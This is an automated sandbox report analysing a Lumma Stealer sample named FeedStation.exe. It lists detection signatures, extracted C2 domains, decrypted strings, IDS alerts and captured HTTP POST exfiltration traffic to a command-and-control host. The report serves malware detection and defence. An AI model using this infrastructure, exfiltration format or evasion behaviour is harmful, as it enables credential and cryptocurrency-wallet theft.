Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FeedStation.exe

Overview

General Information

Sample name:FeedStation.exe
Analysis ID:1587453
MD5:256a1ccec403335433630f6824e081df
SHA1:88abf0221a21e688971e4f746f802d86a86fe085
SHA256:f99595da2c8aca38f9749dc0b36d5203e2d51769db297aaa45bcb1eea27cec5d
Tags:exeLummaStealeruser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FeedStation.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\FeedStation.exe" MD5: 256A1CCEC403335433630F6824E081DF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "ingreem-eilish.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz", "sordid-snaked.cyou"], "Build id": "HpOoIh--3fe7f419a360"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4ae6e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x4e404:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: FeedStation.exe PID: 6416JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: FeedStation.exe PID: 6416JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: FeedStation.exe PID: 6416JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:14.264393+010020283713Unknown Traffic192.168.2.549773104.102.49.254443TCP
              2025-01-10T11:59:15.392088+010020283713Unknown Traffic192.168.2.549783104.21.112.1443TCP
              2025-01-10T11:59:16.390068+010020283713Unknown Traffic192.168.2.549791104.21.112.1443TCP
              2025-01-10T11:59:17.577909+010020283713Unknown Traffic192.168.2.549801104.21.112.1443TCP
              2025-01-10T11:59:18.757926+010020283713Unknown Traffic192.168.2.549807104.21.112.1443TCP
              2025-01-10T11:59:20.346697+010020283713Unknown Traffic192.168.2.549819104.21.112.1443TCP
              2025-01-10T11:59:21.716762+010020283713Unknown Traffic192.168.2.549829104.21.112.1443TCP
              2025-01-10T11:59:23.238401+010020283713Unknown Traffic192.168.2.549840104.21.112.1443TCP
              2025-01-10T11:59:24.286958+010020283713Unknown Traffic192.168.2.549847104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:15.822982+010020546531A Network Trojan was detected192.168.2.549783104.21.112.1443TCP
              2025-01-10T11:59:16.846895+010020546531A Network Trojan was detected192.168.2.549791104.21.112.1443TCP
              2025-01-10T11:59:24.807042+010020546531A Network Trojan was detected192.168.2.549847104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:15.822982+010020498361A Network Trojan was detected192.168.2.549783104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:16.846895+010020498121A Network Trojan was detected192.168.2.549791104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.548954+010020582101Domain Observed Used for C2 Detected192.168.2.5589151.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.469485+010020582141Domain Observed Used for C2 Detected192.168.2.5625901.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.513175+010020582161Domain Observed Used for C2 Detected192.168.2.5612871.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.500882+010020582181Domain Observed Used for C2 Detected192.168.2.5502141.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.481736+010020582201Domain Observed Used for C2 Detected192.168.2.5536301.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.456229+010020582221Domain Observed Used for C2 Detected192.168.2.5578991.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.442100+010020586121Domain Observed Used for C2 Detected192.168.2.5565481.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.581219+010020582261Domain Observed Used for C2 Detected192.168.2.5522811.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:13.537250+010020582361Domain Observed Used for C2 Detected192.168.2.5528141.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:18.100326+010020480941Malware Command and Control Activity Detected192.168.2.549801104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:59:14.766792+010028586661Domain Observed Used for C2 Detected192.168.2.549773104.102.49.254443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://sputnik-1985.com/api#Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/.Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/.mgmdAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com:443/apiAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/api6CAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/api2Avira URL Cloud: Label: malware
              Source: FeedStation.exe.6416.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "ingreem-eilish.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz", "sordid-snaked.cyou"], "Build id": "HpOoIh--3fe7f419a360"}
              Source: FeedStation.exeReversingLabs: Detection: 55%
              Source: FeedStation.exeVirustotal: Detection: 63%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: ingreem-eilish.biz
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--3fe7f419a360
              Source: FeedStation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49819 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49829 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49847 version: TLS 1.2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then cmp al, 2Eh0_2_025072D1
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ebx, ecx0_2_024EE2E9
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then not eax0_2_024F82AE
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_025183B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]0_2_0250D014
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then jmp eax0_2_024FC00A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then add edi, esi0_2_0250C00F
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov dword ptr [ecx], edx0_2_024ED0B1
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then jmp eax0_2_02506159
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-292A76E2h]0_2_0251D142
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ecx, eax0_2_02501112
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_0250A11B
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then push eax0_2_0251C131
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then add edx, ebp0_2_024EA6D2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [esi], ax0_2_0251C6AD
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [esi], ax0_2_024FD772
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [esi], ax0_2_024FD772
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then jmp dword ptr [00442F0Ch]0_2_02503733
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0251E4B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [edi], cx0_2_025095D2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ecx, eax0_2_024EC5D2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then jmp eax0_2_024FC5ED
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_025055B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov edi, dword ptr [esp+2Ch]0_2_025055B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_024FF5B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov esi, eax0_2_024FAA42
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_024FAA42
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then cmp byte ptr [eax+00447659h], 00000000h0_2_024EFA6B
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx ecx, word ptr [esi]0_2_0251DA7A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024F5AD2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]0_2_02506AA2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ecx, eax0_2_02506AA2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then jmp eax0_2_024FC5E8
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then jmp eax0_2_024FCAB1
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0250ABE2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02514BE2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then add edx, ebp0_2_024EA892
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02508E5A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]0_2_0250CEC2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov dword ptr [ecx], edx0_2_024ECEAF
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]0_2_024EDF5C
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]0_2_0250CF4D
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1FE18C32h]0_2_0251EFD2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov dword ptr [ecx], edx0_2_024ECFCA
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ecx, eax0_2_024F5FEE
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*4+00001110h]0_2_024E8FB2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]0_2_024E9CE2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0250CC8F
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000000A0h]0_2_0250CC8F
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then mov ecx, esi0_2_024F8CBA
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1FE18C32h]0_2_0251ED02

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:50214 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:53630 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058612 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz) : 192.168.2.5:56548 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:62590 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:61287 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:52814 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:58915 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:52281 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:57899 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49801 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49791 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49791 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49783 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49783 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49847 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49773 -> 104.102.49.254:443
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: ingreem-eilish.biz
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: DNS query: effecterectz.xyz
              Source: DNS query: diffuculttan.xyz
              Source: DNS query: debonairnukk.xyz
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49791 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49801 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49819 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49807 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49829 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49847 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49840 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49783 -> 104.21.112.1:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4PJXJRFRQIXUO72KPWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3E7H6T7CJBZEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8C5WVK0D5HPZHE5XLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=46HK5RMUNYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6WJTG6236WX8EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1101Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=5c7a4220af3eb1b5130a8937; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 10 Jan 2025 10:59:14 GMTDateProxy-Connect equals www.youtube.com (Youtube)
